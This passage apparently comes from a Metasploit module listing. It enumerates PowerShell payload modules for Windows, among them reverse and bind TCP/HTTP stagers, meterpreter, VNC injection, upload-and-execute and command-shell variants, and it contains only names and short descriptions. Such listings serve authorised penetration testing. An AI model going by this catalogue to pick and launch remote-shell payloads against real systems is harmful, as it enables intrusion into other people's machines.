   80   payload/cmd/windows/powershell/meterpreter/reverse_https_proxy                              normal  No     Powershell Exec, Reverse HTTPS Stager with Support for Custom Proxy
   81   payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp                                 normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   82   payload/cmd/windows/powershell/meterpreter/reverse_named_pipe                               normal  No     Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
   83   payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp                                 normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   84   payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp                                  normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   85   payload/cmd/windows/powershell/meterpreter/reverse_tcp                                      normal  No     Powershell Exec, Reverse TCP Stager
   86   payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports                             normal  No     Powershell Exec, Reverse All-Port TCP Stager
   87   payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns                                  normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   88   payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4                                  normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   89   payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns                              normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   90   payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid                                 normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   91   payload/cmd/windows/powershell/meterpreter/reverse_winhttp                                  normal  No     Powershell Exec, Windows Reverse HTTP Stager (winhttp)
   92   payload/cmd/windows/powershell/meterpreter/reverse_winhttps                                 normal  No     Powershell Exec, Windows Reverse HTTPS Stager (winhttp)
   93   payload/cmd/windows/powershell/metsvc_bind_tcp                                              normal  No     Powershell Exec, Windows Meterpreter Service, Bind TCP
   94   payload/cmd/windows/powershell/metsvc_reverse_tcp                                           normal  No     Powershell Exec, Windows Meterpreter Service, Reverse TCP Inline
   95   payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   96   payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp                             normal  No     Powershell Exec, Hidden Bind TCP Stager
   97   payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp                               normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   98   payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   99   payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe                             normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   100  payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp                               normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   101  payload/cmd/windows/powershell/patchupdllinject/bind_tcp                                    normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   102  payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4                                normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   103  payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid                               normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   104  payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp                            normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   105  payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp                            normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   106  payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp                             normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   107  payload/cmd/windows/powershell/patchupdllinject/reverse_tcp                                 normal  No     Powershell Exec, Reverse TCP Stager
   108  payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports                        normal  No     Powershell Exec, Reverse All-Port TCP Stager
   109  payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns                             normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   110  payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4                             normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   111  payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns                         normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   112  payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid                            normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   113  payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   114  payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp                           normal  No     Powershell Exec, Hidden Bind TCP Stager
   115  payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   116  payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   117  payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe                           normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   118  payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp                             normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   119  payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp                                  normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   120  payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4                              normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   121  payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid                             normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   122  payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   123  payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   124  payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp                           normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   125  payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp                               normal  No     Powershell Exec, Reverse TCP Stager
   126  payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports                      normal  No     Powershell Exec, Reverse All-Port TCP Stager
   127  payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns                           normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   128  payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4                           normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   129  payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns                       normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   130  payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   131  payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp                             normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   132  payload/cmd/windows/powershell/peinject/bind_hidden_tcp                                     normal  No     Powershell Exec, Hidden Bind TCP Stager
   133  payload/cmd/windows/powershell/peinject/bind_ipv6_tcp                                       normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   134  payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid                                  normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   135  payload/cmd/windows/powershell/peinject/bind_named_pipe                                     normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   136  payload/cmd/windows/powershell/peinject/bind_nonx_tcp                                       normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   137  payload/cmd/windows/powershell/peinject/bind_tcp                                            normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   138  payload/cmd/windows/powershell/peinject/bind_tcp_rc4                                        normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   139  payload/cmd/windows/powershell/peinject/bind_tcp_uuid                                       normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   140  payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp                                    normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   141  payload/cmd/windows/powershell/peinject/reverse_named_pipe                                  normal  No     Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
   142  payload/cmd/windows/powershell/peinject/reverse_nonx_tcp                                    normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   143  payload/cmd/windows/powershell/peinject/reverse_ord_tcp                                     normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   144  payload/cmd/windows/powershell/peinject/reverse_tcp                                         normal  No     Powershell Exec, Reverse TCP Stager
   145  payload/cmd/windows/powershell/peinject/reverse_tcp_allports                                normal  No     Powershell Exec, Reverse All-Port TCP Stager
   146  payload/cmd/windows/powershell/peinject/reverse_tcp_dns                                     normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   147  payload/cmd/windows/powershell/peinject/reverse_tcp_rc4                                     normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   148  payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns                                 normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   149  payload/cmd/windows/powershell/peinject/reverse_tcp_uuid                                    normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   150  payload/cmd/windows/powershell/pingback_bind_tcp                                            normal  No     Powershell Exec, Windows x86 Pingback, Bind TCP Inline
   151  payload/cmd/windows/powershell/pingback_reverse_tcp                                         normal  No     Powershell Exec, Windows x86 Pingback, Reverse TCP Inline
   152  payload/cmd/windows/powershell/powershell_bind_tcp                                          normal  No     Powershell Exec
   153  payload/cmd/windows/powershell/powershell_reverse_tcp                                       normal  No     Powershell Exec
   154  payload/cmd/windows/powershell/powershell_reverse_tcp_ssl                                   normal  No     Powershell Exec
   155  payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp                                normal  No     Powershell Exec, Windows Command Shell, Hidden Bind Ipknock TCP Stager
   156  payload/cmd/windows/powershell/shell/bind_hidden_tcp                                        normal  No     Powershell Exec, Windows Command Shell, Hidden Bind TCP Stager
   157  payload/cmd/windows/powershell/shell/bind_ipv6_tcp                                          normal  No     Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   158  payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid                                     normal  No     Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   159  payload/cmd/windows/powershell/shell/bind_named_pipe                                        normal  No     Powershell Exec, Windows Command Shell, Windows x86 Bind Named Pipe Stager
   160  payload/cmd/windows/powershell/shell/bind_nonx_tcp                                          normal  No     Powershell Exec, Windows Command Shell, Bind TCP Stager (No NX or Win7)
   161  payload/cmd/windows/powershell/shell/bind_tcp                                               normal  No     Powershell Exec, Windows Command Shell, Bind TCP Stager (Windows x86)
   162  payload/cmd/windows/powershell/shell/bind_tcp_rc4                                           normal  No     Powershell Exec, Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   163  payload/cmd/windows/powershell/shell/bind_tcp_uuid                                          normal  No     Powershell Exec, Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   164  payload/cmd/windows/powershell/shell/reverse_ipv6_tcp                                       normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (IPv6)
   165  payload/cmd/windows/powershell/shell/reverse_nonx_tcp                                       normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   166  payload/cmd/windows/powershell/shell/reverse_ord_tcp                                        normal  No     Powershell Exec, Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   167  payload/cmd/windows/powershell/shell/reverse_tcp                                            normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager
   168  payload/cmd/windows/powershell/shell/reverse_tcp_allports                                   normal  No     Powershell Exec, Windows Command Shell, Reverse All-Port TCP Stager
   169  payload/cmd/windows/powershell/shell/reverse_tcp_dns                                        normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (DNS)
   170  payload/cmd/windows/powershell/shell/reverse_tcp_rc4                                        normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   171  payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns                                    normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   172  payload/cmd/windows/powershell/shell/reverse_tcp_uuid                                       normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Stager with UUID Support
   173  payload/cmd/windows/powershell/shell/reverse_udp                                            normal  No     Powershell Exec, Windows Command Shell, Reverse UDP Stager with UUID Support
   174  payload/cmd/windows/powershell/shell_bind_tcp                                               normal  No     Powershell Exec, Windows Command Shell, Bind TCP Inline
   175  payload/cmd/windows/powershell/shell_bind_tcp_xpfw                                          normal  No     Powershell Exec, Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   176  payload/cmd/windows/powershell/shell_hidden_bind_tcp                                        normal  No     Powershell Exec, Windows Command Shell, Hidden Bind TCP Inline
   177  payload/cmd/windows/powershell/shell_reverse_tcp                                            normal  No     Powershell Exec, Windows Command Shell, Reverse TCP Inline
   178  payload/cmd/windows/powershell/speak_pwned                                                  normal  No     Powershell Exec
   179  payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp                               normal  No     Powershell Exec, Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   180  payload/cmd/windows/powershell/upexec/bind_hidden_tcp                                       normal  No     Powershell Exec, Windows Upload/Execute, Hidden Bind TCP Stager
   181  payload/cmd/windows/powershell/upexec/bind_ipv6_tcp                                         normal  No     Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   182  payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid                                    normal  No     Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   183  payload/cmd/windows/powershell/upexec/bind_named_pipe                                       normal  No     Powershell Exec, Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   184  payload/cmd/windows/powershell/upexec/bind_nonx_tcp                                         normal  No     Powershell Exec, Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   185  payload/cmd/windows/powershell/upexec/bind_tcp                                              normal  No     Powershell Exec, Windows Upload/Execute, Bind TCP Stager (Windows x86)
   186  payload/cmd/windows/powershell/upexec/bind_tcp_rc4                                          normal  No     Powershell Exec, Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   187  payload/cmd/windows/powershell/upexec/bind_tcp_uuid                                         normal  No     Powershell Exec, Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   188  payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp                                      normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (IPv6)
   189  payload/cmd/windows/powershell/upexec/reverse_nonx_tcp                                      normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   190  payload/cmd/windows/powershell/upexec/reverse_ord_tcp                                       normal  No     Powershell Exec, Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   191  payload/cmd/windows/powershell/upexec/reverse_tcp                                           normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager
   192  payload/cmd/windows/powershell/upexec/reverse_tcp_allports                                  normal  No     Powershell Exec, Windows Upload/Execute, Reverse All-Port TCP Stager
   193  payload/cmd/windows/powershell/upexec/reverse_tcp_dns                                       normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (DNS)
   194  payload/cmd/windows/powershell/upexec/reverse_tcp_rc4                                       normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   195  payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns                                   normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   196  payload/cmd/windows/powershell/upexec/reverse_tcp_uuid                                      normal  No     Powershell Exec, Windows Upload/Execute, Reverse TCP Stager with UUID Support
   197  payload/cmd/windows/powershell/upexec/reverse_udp                                           normal  No     Powershell Exec, Windows Upload/Execute, Reverse UDP Stager with UUID Support
   198  payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp                            normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   199  payload/cmd/windows/powershell/vncinject/bind_hidden_tcp                                    normal  No     Powershell Exec, Hidden Bind TCP Stager
   200  payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp                                      normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   201  payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid                                 normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   202  payload/cmd/windows/powershell/vncinject/bind_named_pipe                                    normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   203  payload/cmd/windows/powershell/vncinject/bind_nonx_tcp                                      normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   204  payload/cmd/windows/powershell/vncinject/bind_tcp                                           normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   205  payload/cmd/windows/powershell/vncinject/bind_tcp_rc4                                       normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   206  payload/cmd/windows/powershell/vncinject/bind_tcp_uuid                                      normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   207  payload/cmd/windows/powershell/vncinject/reverse_hop_http                                   normal  No     Powershell Exec, Reverse Hop HTTP/HTTPS Stager
   208  payload/cmd/windows/powershell/vncinject/reverse_http                                       normal  No     Powershell Exec, Windows Reverse HTTP Stager (wininet)
   209  payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore                          normal  No     Powershell Exec, Reverse HTTP Stager Proxy
   210  payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp                                   normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   211  payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp                                   normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   212  payload/cmd/windows/powershell/vncinject/reverse_ord_tcp                                    normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   213  payload/cmd/windows/powershell/vncinject/reverse_tcp                                        normal  No     Powershell Exec, Reverse TCP Stager
   214  payload/cmd/windows/powershell/vncinject/reverse_tcp_allports                               normal  No     Powershell Exec, Reverse All-Port TCP Stager
   215  payload/cmd/windows/powershell/vncinject/reverse_tcp_dns                                    normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   216  payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4                                    normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   217  payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns                                normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   218  payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid                                   normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   219  payload/cmd/windows/powershell/vncinject/reverse_winhttp                                    normal  No     Powershell Exec, Windows Reverse HTTP Stager (winhttp)
   220  payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp                                     normal  No     Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
   221  payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid                                normal  No     Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
   222  payload/cmd/windows/powershell/x64/custom/bind_named_pipe                                   normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager
   223  payload/cmd/windows/powershell/x64/custom/bind_tcp                                          normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager
   224  payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4                                      normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   225  payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid                                     normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
   226  payload/cmd/windows/powershell/x64/custom/reverse_http                                      normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   227  payload/cmd/windows/powershell/x64/custom/reverse_https                                     normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   228  payload/cmd/windows/powershell/x64/custom/reverse_named_pipe                                normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
   229  payload/cmd/windows/powershell/x64/custom/reverse_tcp                                       normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager
   230  payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4                                   normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   231  payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid                                  normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
   232  payload/cmd/windows/powershell/x64/custom/reverse_winhttp                                   normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
   233  payload/cmd/windows/powershell/x64/custom/reverse_winhttps                                  normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
   234  payload/cmd/windows/powershell/x64/exec                                                     normal  No     Powershell Exec, Windows x64 Execute Command
   235  payload/cmd/windows/powershell/x64/loadlibrary                                              normal  No     Powershell Exec, Windows x64 LoadLibrary Path
   236  payload/cmd/windows/powershell/x64/messagebox                                               normal  No     Powershell Exec, Windows MessageBox x64
   237  payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp                                normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager
   238  payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid                           normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
   239  payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe                              normal  No     Powershell Exec, Windows x64 Bind Named Pipe Stager
   240  payload/cmd/windows/powershell/x64/meterpreter/bind_tcp                                     normal  No     Powershell Exec, Windows x64 Bind TCP Stager
   241  payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4                                 normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   242  payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid                                normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
   243  payload/cmd/windows/powershell/x64/meterpreter/reverse_http                                 normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
   244  payload/cmd/windows/powershell/x64/meterpreter/reverse_https                                normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
   245  payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe                           normal  No     Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
   246  payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp                                  normal  No     Powershell Exec, Windows x64 Reverse TCP Stager
   247  payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4                              normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   248  payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid                             normal  No     Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
   249  payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp                              normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)
   250  payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps                             normal  No     Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)
   251  payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp                                   normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager
   252  payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid                              normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
   253  payload/cmd/windows/powershell/x64/peinject/bind_named_pipe                                 normal  No     Powershell Exec, Windows x64 Bind Named Pipe Stager
   254  payload/cmd/windows/powershell/x64/peinject/bind_tcp                                        normal  No     Powershell Exec, Windows x64 Bind TCP Stager
   255  payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4                                    normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   256  payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid                                   normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
   257  payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe                              normal  No     Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
   258  payload/cmd/windows/powershell/x64/peinject/reverse_tcp                                     normal  No     Powershell Exec, Windows x64 Reverse TCP Stager
   259  payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4                                 normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   260  payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid                                normal  No     Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
   261  payload/cmd/windows/powershell/x64/pingback_reverse_tcp                                     normal  No     Powershell Exec, Windows x64 Pingback, Reverse TCP Inline
   262  payload/cmd/windows/powershell/x64/powershell_bind_tcp                                      normal  No     Powershell Exec
   263  payload/cmd/windows/powershell/x64/powershell_reverse_tcp                                   normal  No     Powershell Exec
   264  payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl                               normal  No     Powershell Exec
   265  payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp                                      normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   266  payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid                                 normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   267  payload/cmd/windows/powershell/x64/shell/bind_named_pipe                                    normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   268  payload/cmd/windows/powershell/x64/shell/bind_tcp                                           normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 Bind TCP Stager
   269  payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4                                       normal  No     Powershell Exec, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   270  payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid                                      normal  No     Powershell Exec, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   271  payload/cmd/windows/powershell/x64/shell/reverse_tcp                                        normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   272  payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4                                    normal  No     Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   273  payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid                                   normal  No     Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   274  payload/cmd/windows/powershell/x64/shell_bind_tcp                                           normal  No     Powershell Exec, Windows x64 Command Shell, Bind TCP Inline
   275  payload/cmd/windows/powershell/x64/shell_reverse_tcp                                        normal  No     Powershell Exec, Windows x64 Command Shell, Reverse TCP Inline
   276  payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp                                  normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager
   277  payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid                             normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
   278  payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe                                normal  No     Powershell Exec, Windows x64 Bind Named Pipe Stager
   279  payload/cmd/windows/powershell/x64/vncinject/bind_tcp                                       normal  No     Powershell Exec, Windows x64 Bind TCP Stager
   280  payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4                                   normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   281  payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid                                  normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
   282  payload/cmd/windows/powershell/x64/vncinject/reverse_http                                   normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
   283  payload/cmd/windows/powershell/x64/vncinject/reverse_https                                  normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
   284  payload/cmd/windows/powershell/x64/vncinject/reverse_tcp                                    normal  No     Powershell Exec, Windows x64 Reverse TCP Stager
   285  payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4                                normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   286  payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid                               normal  No     Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
   287  payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp                                normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)
